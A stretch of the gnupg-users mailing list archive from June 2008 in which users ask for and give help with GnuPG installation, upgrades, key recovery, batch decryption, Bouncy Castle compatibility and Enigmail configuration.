From kloecker at kde.org Sun Jun 1 00:10:39 2008 From: kloecker at kde.org (Ingo =?iso-8859-1?q?Kl=F6cker?=) Date: Sun, 01 Jun 2008 00:10:39 +0200 Subject: Enigmail... In-Reply-To: <7ac5b3134e215b5a7f7c60d5b2866462@pboxmix.winstonsmith.info> References: <7ac5b3134e215b5a7f7c60d5b2866462@pboxmix.winstonsmith.info> Message-ID: <200806010010.39980@erwin.ingo-kloecker.de> On Thursday 29 May 2008, Non scrivetemi wrote: > > I just tryed the plug-in Enigmail on Thunderbird, and it seems very > > good. > > Enigmail is indeed quite brilliant. It's so good that once you've > installed it you quickly yearn for a better mail client than > Thunderbird, which is as bug-ridden a piece of rubbish as I've > seen. Do not despair. The Windows and Mac OS X ports of Kontact have just been announced on LinuxTag. So very soon now there will be no excuse anymore for using Thunderbird. ;-) Press announcement of the German Federal Office for Information Security (BSI) (sorry, German only): http://www.bsi.bund.de/presse/pressinf/linuxtag210508.htm Regards, Ingo -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 194 bytes Desc: This is a digitally signed message part. URL: From ahairape at mail.yerphi.am Mon Jun 2 10:35:35 2008 From: ahairape at mail.yerphi.am (Arsen Hayrapetyan) Date: Mon, 2 Jun 2008 13:35:35 +0500 (AMST) Subject: about GnuPG In-Reply-To: <285591.78150.qm@web45503.mail.sp1.yahoo.com> References: <285591.78150.qm@web45503.mail.sp1.yahoo.com> Message-ID: Hi Tigran! > My name is Tigran and I have some issue ... > On my system (Linux RH9 2.4.29) I'm using gpg (GnuPG) 1.2.1 with zlib-1.1.4-8. But when I'm tring to decrypt files which was encrypted with public and private keys it get me this error message: > --------------------------------------------------------------------------- > gpg --decrypt-files /root/Test.xls.gpg > gpg: encrypted with 2048-bit ELG-E key, ID 80224B85, created 2005-02-11 > "test1 " > File `/root/Test.xls' exists. Overwrite (y/N)? y > gpg: fatal: zlib inflate problem: invalid stored block lengths > secmem usage: 2048/3104 bytes in 4/7 blocks of pool 4544/16384 > --------------------------------------------------------------------------------------- > After this it creates a file Test.xls, but it has very small size and I can't open it 'cause it's damaged. > I try to change my zlib with zlib 1.2.3 but it not help. Then I changed version of GPG with GPG 1.4.9. But steel I don't fix my issue. If you have any ideas please write me back ASAP. > I have searched in a couple of mailing lists and found out the following: 1) http://217.69.76.57/pipermail/gnupg-users/2002-March/012433.html http://217.69.76.57/pipermail/gnupg-users/2002-March/012442.html http://217.69.76.57/pipermail/gnupg-users/2002-March/012434.html 2) http://readlist.com/lists/gnupg.org/gnupg-users/0/3480.html http://readlist.com/lists/gnupg.org/gnupg-users/0/3481.html http://readlist.com/lists/gnupg.org/gnupg-users/0/3482.html http://readlist.com/lists/gnupg.org/gnupg-users/0/3484.html Personally, I've never encountered this problem, but maybe this helps you to solve it... Best regards, Arsen. From faramir.cl at gmail.com Mon Jun 2 12:48:27 2008 From: faramir.cl at gmail.com (Faramir) Date: Mon, 02 Jun 2008 06:48:27 -0400 Subject: problem with forgotten passphrase, no revocation certificate available. Message-ID: <4843CFFB.1060401@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Well, I made another key, for "playing" with it. Unfortunatelly, I didn't make the revocation certificate that day. Now I was going to make it and... surprise! wrong passphrase... Well, I was not happy with this, but since nobody would be using that key to write messages to me, I thought I could just delete it... but on second thought, I searched it in a key server... and the key was found. So, here is the question: Can that public key cause problems, if I associate another key with the same email account? The only explanation I can think about is I forgot one of the "mutations" of the passphrase, probably 2 characters, but that would mean to test about 1000 different combinations, and I won't do that manually. Is there any tool to automatise the process? The key is on my private keyring, and I don't know how to extract it without knowing the pass... -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJIQ8/7AAoJEMV4f6PvczxAGvMH/il/jP9Ppj4RwmFJB2thN0Kh TTEWGGVjeOfZRid9oq232gS+7ofDA94yXTskpq5I6yXFsLDQkyCg/7sN+99mGTmC qHdyYSlP/a+WI+b/hd8B3QcBFi8J9FyE3b6WDa0527xP4lk/ax7GGDGFikVXyDaO Lnridy2lI0cyfW+LVAjwYHSt37d3Sk/5TgfOTZIYXzTDiI2m54xBXxQ3d1cnVdFm e5SRYkVZhMIG0GFS1n4aHgLGEvKvJ4Wta1O+5nJdZMcLobd0LE1hOT3ozkZwumWI eOeb+PQ35h8h/wkraIFEmwFgj+JW61o0ll5CySb2Ssydy2MBkGwg7sqFg95jQA8= =UBkJ -----END PGP SIGNATURE----- From mmlith at utu.fi Mon Jun 2 14:48:19 2008 From: mmlith at utu.fi (MastahYoda) Date: Mon, 2 Jun 2008 05:48:19 -0700 (PDT) Subject: Updating GnuPG to 1.4.9 Message-ID: <17600484.post@talk.nabble.com> Hi there! I'm running GnuPG on Windows and I would like to update my old GnuPG to newer version, 1.4.9. How can I do it so, that I can still use my existing keys? I tried quick-and-dirty method in my test machine and copy-pasted only new exe-files to my old gnupg-folder. Obviously it didn't work, because I couldn't find any keys when running --list-keys.. So does anyone know how to update correctly? Thanks! -- View this message in context: http://www.nabble.com/Updating-GnuPG-to-1.4.9-tp17600484p17600484.html Sent from the GnuPG - User mailing list archive at Nabble.com. From laurent.jumet at skynet.be Tue Jun 3 10:29:25 2008 From: laurent.jumet at skynet.be (Laurent Jumet) Date: Tue, 03 Jun 2008 10:29:25 +0200 Subject: Updating GnuPG to 1.4.9 In-Reply-To: <17600484.post@talk.nabble.com> Message-ID: Hello MastahYoda ! MastahYoda wrote: > I'm running GnuPG on Windows and I would like to update my old GnuPG to > newer version, 1.4.9. How can I do it so, that I can still use my existing > keys? I tried quick-and-dirty method in my test machine and copy-pasted only > new exe-files to my old gnupg-folder. Obviously it didn't work, because I > couldn't find any keys when running --list-keys.. So does anyone know how to > update correctly? Thanks! Install GnuPG1.4.9 and by default, main program will be in C:\GnuPG Copy your actual keyrings in C:\GnuPG\Keyrings Additional plug-ins like IDEA.DLL are in C:\Lib\Gnupg Pubring.gpg and Secring.gpg are the default names for GPG; may be your actual keyrings are not in that format but look like .pgp .pkr .skr, so you only need to import them once, to create the .gpg files. -- Laurent Jumet KeyID: 0xCFAF704C From faramir.cl at gmail.com Tue Jun 3 13:48:49 2008 From: faramir.cl at gmail.com (Faramir) Date: Tue, 03 Jun 2008 07:48:49 -0400 Subject: Updating GnuPG to 1.4.9 In-Reply-To: References: Message-ID: <48452FA1.8060800@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Laurent Jumet escribi?: > Hello MastahYoda ! > > MastahYoda wrote: > >> I'm running GnuPG on Windows and I would like to update my old GnuPG to >> newer version, 1.4.9. How can I do it so, that I can still use my existing >> keys? I tried quick-and-dirty method in my test machine and copy-pasted only >> new exe-files to my old gnupg-folder. Obviously it didn't work, because I >> couldn't find any keys when running --list-keys.. So does anyone know how to >> update correctly? Thanks! > > Install GnuPG1.4.9 and by default, main program will be in C:\GnuPG > Copy your actual keyrings in C:\GnuPG\Keyrings > Additional plug-ins like IDEA.DLL are in C:\Lib\Gnupg > > Pubring.gpg and Secring.gpg are the default names for GPG; may be your actual > keyrings are not in that format but look like .pgp .pkr .skr, so you only need to > import them once, to create the .gpg files. > I figure it is a good idea to export the private and public keyrings before doing any change... I mean, upgrades are good things, but sometimes can cause unexpected effects. With a backup, if everything goes wrong, you can always reimport the keys. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJIRS+hAAoJEMV4f6PvczxAtPMH/Rr3/Jv1vbvce7rRhMwoG+VV aK0SdOIjhtjYvkPznWzNpVr6ExEF/+S0PdgBkgJGrR9UBrhDAHuLzcsc88hKhnho crZXCoN3FUmdn34nWP1RZjYHNXUAWqCp+j4WGpaYZIA5uB46Fgea7R7hUYd7Tizo 4PT7GJ3Xg7RHt1rFYth/9u90PrNlSu6ibRN1AjYTF1H/e16Q4hGtk/NVPjcmOkRv iJqzCXLdz7O98uPyLbLzJhY7uPR7taKRtU1GUn9ZvtATQil4GXifUTX+wS5k7n/A fvp+/rv8WdiNUjtmyLJ8jqn/uIUCI08uvLLm2y3vmdikIaaWDNBwL+SRnrRopEE= =s37w -----END PGP SIGNATURE----- From yalla at fsfe.org Tue Jun 3 14:15:37 2008 From: yalla at fsfe.org (Alexander W. Janssen) Date: Tue, 03 Jun 2008 14:15:37 +0200 Subject: Updating GnuPG to 1.4.9 In-Reply-To: <48452FA1.8060800@gmail.com> References: <48452FA1.8060800@gmail.com> Message-ID: <484535E9.1050404@fsfe.org> Faramir wrote: > I figure it is a good idea to export the private and public keyrings > before doing any change... I mean, upgrades are good things, but > sometimes can cause unexpected effects. With a backup, if everything > goes wrong, you can always reimport the keys. I learned that the hard way yesterday... After my server-based Windows-profile got deleted and created again, I imported secring.gpg and pubring.gpg. And after quite some effort I even got my smartcard running again... So I totally agree with you. Do a clean export so that you can import everything again. Famous last words: If "weird stuff" happens (like gpg.exe working, but Enigmail refuses to see the keyring) check the registry-key HKEY_CURRENT_USER\Software\GNU\gnupg for the string "HomeDir". I had to make it point to the location where the actual keyring is (on a USB-thumbdrive with a portable gpg...) -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 305 bytes Desc: OpenPGP digital signature URL: From wk at gnupg.org Tue Jun 3 17:22:38 2008 From: wk at gnupg.org (Werner Koch) Date: Tue, 03 Jun 2008 17:22:38 +0200 Subject: removing (uninstalling) GNUPG / GPG4Win 1.1.0.407 In-Reply-To: (Eduardo Burkhard's message of "Tue, 3 Jun 2008 10:56:46 -0300") References: Message-ID: <87zlq2zgox.fsf@wheatstone.g10code.de> Eduardo, [It is unlikely that you can convince anyone to reply faster or to reply at all if you resend your mails several times within a short period. In particular cross-posting as weel as incling the webmaster(!) is not a good idea.] On Tue, 3 Jun 2008 15:56, ed.burkhard at ibest.com.br said: > ("Add/Remove Programs)". Neither do I find any "uninstall-file" in the > folder, in which the program has been installed ("C:\...\GNU\...). I already told you that the file is called gpg4win-uninsteall but you probably run an uninstall already but terminated it prematurely. > be insufficient memory, ore that the .dll file could not be found. As a > matter of fact, this "gpgol.dll" file is missing on my system. Outlook usually disables non-working plugins automagically. If it did not, go to the Outlook Extended Options menu to popup the Add-In Manager and disable gpgol. Salam-Shalom, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From ed.burkhard at ibest.com.br Tue Jun 3 15:56:46 2008 From: ed.burkhard at ibest.com.br (Eduardo Burkhard) Date: Tue, 3 Jun 2008 10:56:46 -0300 Subject: removing (uninstalling) GNUPG / GPG4Win 1.1.0.407 Message-ID: Hi there! How should I proceed, in order to completely uninstall GNUPG / GPG4Win (version 1.1.0.407) from my system, without leaving any tracks of it in the Registry? I do not find anything at all of this program in the Control Panel ("Add/Remove Programs)". Neither do I find any "uninstall-file" in the folder, in which the program has been installed ("C:\...\GNU\...). My Operating System is Windows XP Professional SP2. Remark: each time while opening Outlook (Brazilian-Portuguese version 2002 SP3), there always appear a warning screen, saying (translated now, from Portuguese to English) that the file "C:\...\GNU\GnuPG\gpgol.dll" can not be installed or loaded; furthermore, this warning message says that there could be insufficient memory, ore that the .dll file could not be found. As a matter of fact, this "gpgol.dll" file is missing on my system. So, does anyone know how to remove this program correctly? Thanks! Eduardo Burkhard From faramir.cl at gmail.com Tue Jun 3 19:09:52 2008 From: faramir.cl at gmail.com (Faramir) Date: Tue, 03 Jun 2008 13:09:52 -0400 Subject: problem with forgotten passphrase, no revocation certificate available. In-Reply-To: <4843CFFB.1060401@gmail.com> References: <4843CFFB.1060401@gmail.com> Message-ID: <48457AE0.7050705@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Faramir escribi?: > Well, I made another key, for "playing" with it. Unfortunatelly, I > didn't make the revocation certificate that day. Now I was going to make > it and... surprise! wrong passphrase... Well, I was not happy with this, > but since nobody would be using that key to write messages to me, I > thought I could just delete it... but on second thought, I searched it > in a key server... and the key was found. > > So, here is the question: Can that public key cause problems, if I > associate another key with the same email account? > > The only explanation I can think about is I forgot one of the > "mutations" of the passphrase, probably 2 characters, but that would > mean to test about 1000 different combinations, and I won't do that > manually. Is there any tool to automatise the process? The key is on my > private keyring, and I don't know how to extract it without knowing the > pass... I have good news (good for me at least): I checked the gpg installed in my USB flash memory, and I found the private key (or at least, the private subkeys for that key), and since I had not forgotten that passphrase, I could revoke the key. Anyway, I still would like to know the answers for these questions... Regards -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJIRXrgAAoJEMV4f6PvczxAywEH/0rT41L6M0JUvKsvBxUli64P z9SdXFtUp/GnN8JqBI9qfgo0bSwEd87RFpDbEKTgcims2HGE9R7zbWMWE2gLXm8h 6VgOJxVcP1XJ9lOMBGk1426+l/WhEAfaR7M0HSaz2qPLNF3DSrtLX5dgyZqHlFCY SWX34775PvGAtktpz5mjNdIb+xvn+TsFwpTr5Ql2wgGDpBR3CA+ADHzwNjkL+xsB 0zIR2CyzZNJL4qZZIbLaRybStuf4my3SYlr4gyhk7LnJg8sTXEhcSdK6rgglolyr Z3Jun2qSIaGVe8QWtFXngSgAMHj8UbitzNqoP0QmuXIK4AEmv4EwykdAlXOuICw= =1FX5 -----END PGP SIGNATURE----- From faramir.cl at gmail.com Tue Jun 3 19:40:42 2008 From: faramir.cl at gmail.com (Faramir) Date: Tue, 03 Jun 2008 13:40:42 -0400 Subject: removing (uninstalling) GNUPG / GPG4Win 1.1.0.407 In-Reply-To: References: Message-ID: <4845821A.2000902@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Eduardo Burkhard escribi?: > Hi there! > > How should I proceed, in order to completely uninstall GNUPG / GPG4Win > (version 1.1.0.407) from my system, without leaving any tracks of it in the > Registry? I do not find anything at all of this program in the Control Panel > ("Add/Remove Programs)". Neither do I find any "uninstall-file" in the > folder, in which the program has been installed ("C:\...\GNU\...). > > My Operating System is Windows XP Professional SP2. > > Remark: each time while opening Outlook (Brazilian-Portuguese version 2002 > SP3), there always appear a warning screen, saying (translated now, from > Portuguese to English) that the file "C:\...\GNU\GnuPG\gpgol.dll" can not be > installed or loaded; furthermore, this warning message says that there could > be insufficient memory, ore that the .dll file could not be found. As a > matter of fact, this "gpgol.dll" file is missing on my system. > > So, does anyone know how to remove this program correctly? Thanks! Maybe you should try something to remove unused entries from the registry... like CCleaner. It is free. But make a backup, before doing changes... I am not so sure how much control does it provides... -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJIRYIaAAoJEMV4f6PvczxAmx8H/3f11BHwmeySwA//MmwUla6x Qa1Yf7IlHpReYnuT90zte0LqqbJBXWEsi1ksWkonvF9wKrhC3/16NyDiixvhb9Oe pBU+5WLMUQOmJymAtkelfCj4c6huETUf9AP7f5TYqZ2X15xdy8p6wBHtzD6D9YJd EIYGNtJaLIvcEieFdxU10JPVKLHCmyl2JaH9/OgdIMeHJAsj/GJNgWjPH6WiOmVw CqKwXLiZoElp4l4Oj14mMO5vD6ie2NZZ3f6vLiVWW6WYB5McV36s06cM1BL+FkYh OpuQPd/QLY59hxh5clbENUKU7ExrPuAdMMQGzmyZ0C4aQnwCHMd49GTQ2oRJW9Q= =LCQJ -----END PGP SIGNATURE----- From tobias.weisserth at gmail.com Tue Jun 3 18:41:49 2008 From: tobias.weisserth at gmail.com (Tobias Weisserth) Date: Tue, 3 Jun 2008 18:41:49 +0200 Subject: SCM SPR532 & Ubuntu 8.04 & GnuPG 1.4.6 versus GnuPG 2.0.7 In-Reply-To: <43cee7130805311039h738c4ea3x3b6e814ed2095ca7@mail.gmail.com> References: <43cee7130805311039h738c4ea3x3b6e814ed2095ca7@mail.gmail.com> Message-ID: <43cee7130806030941x552d9c6i67166432954ce4f0@mail.gmail.com> !PING! I am just following up on this to get a reaction. Any ideas, tutorials or pointers for GnuPG SmartCard use with a pin pad card reader like the SCM SPR532? I didn't make any progress by myself. I really need help here. Thanks, Tobias W. -------------- next part -------------- An HTML attachment was scrubbed... URL: From jmoore3rd at bellsouth.net Tue Jun 3 21:10:03 2008 From: jmoore3rd at bellsouth.net (John W. Moore III) Date: Tue, 03 Jun 2008 15:10:03 -0400 Subject: removing (uninstalling) GNUPG / GPG4Win 1.1.0.407 In-Reply-To: <4845821A.2000902@gmail.com> References: <4845821A.2000902@gmail.com> Message-ID: <4845970B.4060205@bellsouth.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Faramir wrote: > Eduardo Burkhard escribi?: >> How should I proceed, in order to completely uninstall GNUPG / GPG4Win >> (version 1.1.0.407) from my system >> My Operating System is Windows XP Professional SP2. >> So, does anyone know how to remove this program correctly? Thanks! > > Maybe you should try something to remove unused entries from the > registry... like CCleaner. It is free. But make a backup, before doing > changes... I am not so sure how much control does it provides... For 'detailed' cleaning of the Registry in Windows _without_ having to use RegEdit and manually search I recommend the Free App RegCleaner.exe which may be located via a Web Search. This App will offer You the ability to specifically target/seek Registry entries using Your Search term(s). Be sure and select the Back-Up option prior to deleting! JOHN ;) Timestamp: Tuesday 03 Jun 2008, 15:09 --400 (Eastern Daylight Time) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.5.0-svn4754: (MingW32) Comment: Public Key at: http://tinyurl.com/8cpho Comment: Gossamer Spider Web of Trust: https://www.gswot.org Comment: Homepage: http://tinyurl.com/yzhbhx iQEcBAEBCgAGBQJIRZcJAAoJEBCGy9eAtCsP4q8H/3Z4CLededZ0PZqghRSsB4ko HND8IDeCuIURiBcHN2I8hpBrMeMltaYBlI1hCqjex4y7oP2TrdUOZJMexDV02Zte qV02CP3nApsiWZXnc9TvHeeYrKVA8c+5lTCfThrCQFiaZpk66Z8Wz/oji3RrZmzt O15X3723mdZmMdDROK3b5w7TU9AfscAXYYM4jfPgh5B5YKbtXRi3liXoNKhOPX9G 1MRFCBfHRCuQe1w7pwkxCq6rAidPXHGTtnZFALAorcbeIZTehSIOpZG2vvDMagnN KtrZRJ/twbXiY0vC2HdHtKH/3n3n/JLy75QtNTW1XivjExXhaoYx68HXqCdaiDU= =qBNA -----END PGP SIGNATURE----- From gukgukcommunity at yahoo.com Wed Jun 4 06:45:54 2008 From: gukgukcommunity at yahoo.com (guk guk) Date: Tue, 3 Jun 2008 21:45:54 -0700 (PDT) Subject: Automating Decryption using gpg --batch --passphrase-file or gpg --batch --passphrase-fd 0 Message-ID: <521129.96578.qm@web46014.mail.sp1.yahoo.com> Hi ! I tried to automate decryption of pgp files by running this command line in windows xp gpg --batch --passphrase-fd 0 < passphrase.txt --output "OUTPUT.CSV" --decrypt "OUTPUT.CSV.pgp" or gpg --batch --passphrase-file passphrase.txt --output "OUTPUT.CSV" --decrypt "OUTPUT.CSV.pgp" but it's always failed. It always throw an error gpg: encrypted with 2048-bit RSA key, ID , created 2008-05-08 gpg: public key decryption failed: bad passphrase gpg: decryption failed: secret key not available I'm using gnupg 1.4.9. Can anybody help me please? Thanks -------------- next part -------------- An HTML attachment was scrubbed... URL: From bhushan1988 at gmail.com Wed Jun 4 11:00:09 2008 From: bhushan1988 at gmail.com (Bhushan Jain) Date: Wed, 4 Jun 2008 10:00:09 +0100 Subject: Incompatibility between GnuPG encryption and the Bouncy Castle encryption. Message-ID: <62fd3c0a0806040200u7e6fd86bme4059ec1b2ceeb54@mail.gmail.com> Hi, I have created RSA key as well as its subkey for encryption using GnuPG. Now I encrypted a file using JAVA library functions given by Bouncy Castle (a pgp library in JAVA which claims to adhere to rfc 2440). I also encrypted the same file using the GnuPG commands from command line. The following are the results of the pgpdump for both of them........... PGPdump for GnuPG:------ PGPdump Results Old: Public-Key Encrypted Session Key Packet(tag 1)(140 bytes) New
version(3) Key ID - 0xB84434E8A6EACCA8 Pub alg - RSA Encrypt or
Sign(pub 1) RSA m^e mod n(1024 bits) - 88 74 a9 7c bb 85 c6 1d 19 82 55
ec 72 86 93 4d 74 52 94 a4 c1 e7 9f bd b9 9d 8c 82 da 08 d1 db 71 09 4f
de 40 77 16 95 7f 52 14 11 23 c0 61 68 61 eb 43 c7 80 ac 6b 36 df 65 99
e7 f8 14 78 1f d7 3f 18 41 10 aa 5e df 59 a2 eb 49 39 c2 d6 4a a8 be 07
fe 9a ae 7b 95 2e 90 e1 30 3f 47 9c bb 96 f1 1d 17 9b 6b 6c a6 5b 4d 57
f0 fa de 6b c9 51 aa 36 e6 81 87 3d c0 ff c6 b6 5b 8c 66 6d 1f -&gt; m
= sym alg(1 byte) + checksum(2 bytes) + PKCS-1 block type 02
New: Symmetrically Encrypted and MDC Packet(tag 18)(168 bytes) Ver 1
Encrypted data [sym alg is specified in pub-key encrypted session key]
(plain text + MDC SHA1(20 bytes))

PGPdump for BouncyCastle:-------------- PGPdump Results Old: Public-Key Encrypted Session Key Packet(tag 1)(140 bytes) New
version(3) Key ID - 0xB84434E8A6EACCA8 Pub alg - RSA Encrypt or
Sign(pub 1) RSA m^e mod n(1024 bits) - af db e9 49 ce f1 f5 d5 c1 ab a3
59 39 f2 a6 6e 05 2f 99 9d 79 87 cf 19 3a 9f ad 15 da 8d 83 ee a9 36 72
c3 23 42 33 70 2f 40 69 03 2f 9c 18 44 bb 20 b2 5c 5e 09 fd ad c4 16 61
39 07 a1 a7 ab 1d 0c 06 69 d5 81 8d 2c 65 ae 89 b6 db 5d e0 5e 4d 6e d8
ae 7b f1 3b f1 52 a3 52 24 a0 55 2c 43 47 66 cd 92 a1 3e c5 c2 38 4c 02
5d e6 59 bf b3 6d 09 a0 9b cc 63 46 ec 7a cf f6 7f 62 f9 1a 86 -&gt; m
= sym alg(1 byte) + checksum(2 bytes) + PKCS-1 block type 02
New: Symmetrically Encrypted and MDC Packet(tag 18)(155 bytes) Ver 1
Encrypted data [sym alg is specified in pub-key encrypted session key]
(plain text + MDC SHA1(20 bytes))
I am also attaching the encrypted files...... When I use GnuPG to decrypt the file encrypted using Bouncy Castle Libraries, the file gets decrypted correctly. But if I use Bouncy Castle to decrypt the file encrypted using GnuPG, I get an exception stating illegal key size. The following is the stacktrace for the program. org.bouncycastle.openpgp.PGPException: Exception starting decryption java.security.InvalidKeyException: *Illegal key size * at javax.crypto.Cipher.a(Unknown Source) at javax.crypto.Cipher.init(Unknown Source) at javax.crypto.Cipher.init(Unknown Source) at org.bouncycastle.openpgp.PGPPublicKeyEncryptedData.getDataStream(Unknown Source) at org.bouncycastle.openpgp.PGPPublicKeyEncryptedData.getDataStream(Unknown Source) at bouncyCastlePGP.BcDecrypt.decrypt_bc(BcDecrypt.java:130) The statement giving exception is supposed to give a decrypted stream using the secret key. But the same decryption program using Bouncy Castle decrypts correctly the file encrypted using Bouncy Castle libraries. The only difference I could observe in the dumps of both the files is the packet size of New packet(tag 18).(Highlighted) Can that make a difference? Plz help me ..... or is it that GnuPG donot follow the rfc2440?? Thanks, ------------------ Bhushan. -------------- next part -------------- An HTML attachment was scrubbed... URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: encrypted_using_GnuPG.txt.gpg Type: application/octet-stream Size: 527 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: encrypted_using_BouncyCastle.txt.gpg Type: application/octet-stream Size: 499 bytes Desc: not available URL: From phil-gpg at tinsleyviaduct.com Wed Jun 4 17:13:00 2008 From: phil-gpg at tinsleyviaduct.com (Phil Reynolds) Date: Wed, 04 Jun 2008 16:13:00 +0100 Subject: Wildcards in uids? Message-ID: <20080604161300.esjouxce7r44c8o4@topdeck.tinsleyviaduct.com> I have recently started using suffixed e-mail addresses and am wondering if I might need to add suffixes I am using to my key - or if I can add something that would catch them all. If I need to add them individually, it may be better to add the ones I need to as I need them, but if a catch-all is possible, please advise me as to how I need to specify it. -- Phil Reynolds o ____ mail: phil-gpg at tinsleyviaduct.com |L_ \ / Web: http://www.tinsleyviaduct.com/phil/ (_)- \/ Waltham 66, Emley Moor 69, Droitwich 79, Windows 95 From carloswill at gmail.com Wed Jun 4 18:02:30 2008 From: carloswill at gmail.com (Carlos Williams) Date: Wed, 4 Jun 2008 12:02:30 -0400 Subject: Am I Missing Something? In-Reply-To: <483EFB33.1080607@bellsouth.net> References: <483EC791.7050100@mac.com> <483EFB33.1080607@bellsouth.net> Message-ID: On Thu, May 29, 2008 at 2:51 PM, John W. Moore III wrote: > > Make certain that on the 'OpenPGP' > 'Preferences' > 1st Tab that the > Path to gpg.exe is correct. I am not using Windows so I can't say for sure about *.exe. I am using Linux and Mozilla Thunderbird. I uninstalled and reinstalled Enigmail on my Mozilla Thunderbird just to be make sure the "plugin" worked properly. I then looked at my keys generated on my system: cwilliams at tunafish:~/.gnupg$ gpg --list-keys /home/cwilliams/.gnupg/pubring.gpg ---------------------------------- pub 1024D/C4B187CB 2008-05-29 uid Carlos Williams sub 8446g/6B90B444 2008-05-29 ***I don't know if I should be publicly posting the info above...Is that bad to show in public?*** Anyways - Enigmail does not find my key. I installed the most recent version on my Linux / Thunderbird system... I am fairly lost on why this is not working for me...any suggestions? From dshaw at jabberwocky.com Wed Jun 4 19:08:40 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Wed, 4 Jun 2008 13:08:40 -0400 Subject: Wildcards in uids? In-Reply-To: <20080604161300.esjouxce7r44c8o4@topdeck.tinsleyviaduct.com> References: <20080604161300.esjouxce7r44c8o4@topdeck.tinsleyviaduct.com> Message-ID: <20080604170840.GB5992@jabberwocky.com> On Wed, Jun 04, 2008 at 04:13:00PM +0100, Phil Reynolds wrote: > > I have recently started using suffixed e-mail addresses and am wondering > if I might need to add suffixes I am using to my key - or if I can add > something that would catch them all. > > If I need to add them individually, it may be better to add the ones I > need to as I need them, but if a catch-all is possible, please advise me > as to how I need to specify it. Sorry, there is no way within GnuPG to do such a thing. It's frequently doable outside of GnuPG via your mail program, but you'd have to consult the documentation for that program to learn how. David From aongenae at gmail.com Wed Jun 4 20:09:38 2008 From: aongenae at gmail.com (Arnaud Ongenae) Date: Wed, 4 Jun 2008 20:09:38 +0200 Subject: Am I Missing Something? In-Reply-To: References: <483EC791.7050100@mac.com> <483EFB33.1080607@bellsouth.net> Message-ID: <83713a650806041109i69c9dfffleef777e16e0e0723@mail.gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wed, Jun 4, 2008 at 6:02 PM, Carlos Williams wrote: > On Thu, May 29, 2008 at 2:51 PM, John W. Moore III > wrote: >> >> Make certain that on the 'OpenPGP' > 'Preferences' > 1st Tab that the >> Path to gpg.exe is correct. > > I am not using Windows so I can't say for sure about *.exe. I am using > Linux and Mozilla Thunderbird. on linux it's /usr/bin/gpg (or /usr/bin/gpg2) > > I uninstalled and reinstalled Enigmail on my Mozilla Thunderbird just > to be make sure the "plugin" worked properly. > > I then looked at my keys generated on my system: > > cwilliams at tunafish:~/.gnupg$ gpg --list-keys > /home/cwilliams/.gnupg/pubring.gpg > ---------------------------------- > pub 1024D/C4B187CB 2008-05-29 > uid Carlos Williams > sub 8446g/6B90B444 2008-05-29 > > ***I don't know if I should be publicly posting the info above...Is > that bad to show in public?*** this are no confidential information > > Anyways - Enigmail does not find my key. I installed the most recent > version on my Linux / Thunderbird system... > > I am fairly lost on why this is not working for me...any suggestions? > > _______________________________________________ > Gnupg-users mailing list > Gnupg-users at gnupg.org > http://lists.gnupg.org/mailman/listinfo/gnupg-users > Do you see my signature (or from other person on this list) in thunderbird ??? _-Arnaud-_ -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.7 (GNU/Linux) Comment: http://getfiregpg.org iQEcBAEBAgAGBQJIRtphAAoJEFgy9SDyxO8hrqUH+gLpf4MHe12NndEfnovqyygA WC5xxR1X2PJrk82ls9MA0KoRlRJ5l/SLHkwqiFMGJm2qHhx2WHB/8bqdPR9OZqgv Ocn3tOKnNRs9bBsD8+tcSgOdUNsiTxD9eIukENRT2ZG2Rf8OppVFhK4bbRZZdYXw SkgW+H4xJtQG9DoJN7us9JxDKDpOxbZ3N5DD9WPMh7TEukv40L1hWUlF6KV5UFJ0 7jVz8jw9IYfpO8ZYj8SFM3Zgj/qqXdySBOArygYoUr6+g1UcedBtej4XwylqFwRD EFkpN/8DfxsQ+jTr6/FnXeZRo+uTsFaERvOW9EJMqCweOEsKmjWrSVOCP+PcdaQ= =oRXJ -----END PGP SIGNATURE----- From aongenae at gmail.com Wed Jun 4 20:25:38 2008 From: aongenae at gmail.com (Arnaud Ongenae) Date: Wed, 4 Jun 2008 20:25:38 +0200 Subject: Am I Missing Something? In-Reply-To: References: <483EC791.7050100@mac.com> <483EFB33.1080607@bellsouth.net> <83713a650806041109i69c9dfffleef777e16e0e0723@mail.gmail.com> Message-ID: <83713a650806041125h5bf5c694l36f7c6dacd04e38e@mail.gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 You may give a try to FireGPG (an extension to Firefox) that allow to use gpg in the Gmail interface... it's really easy http://getfiregpg.org/index.php?page=home&lang=en It will show if the mail are signed even if it's not your mail is not configured for gpg so you will be able to see if gpp is well configured, then we can try to find out other solution _-Arnaud-_ -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.7 (GNU/Linux) Comment: http://getfiregpg.org iQEcBAEBAgAGBQJIRt4hAAoJEFgy9SDyxO8htNYH/0V1pAS9KASRUHdMcSsh/DBe SudmfVC+cZsnHVJ0Pp45dPQWusZhe0ahAjkhGHCTAfGcJRPDeV+6f0fBiq3eyihB 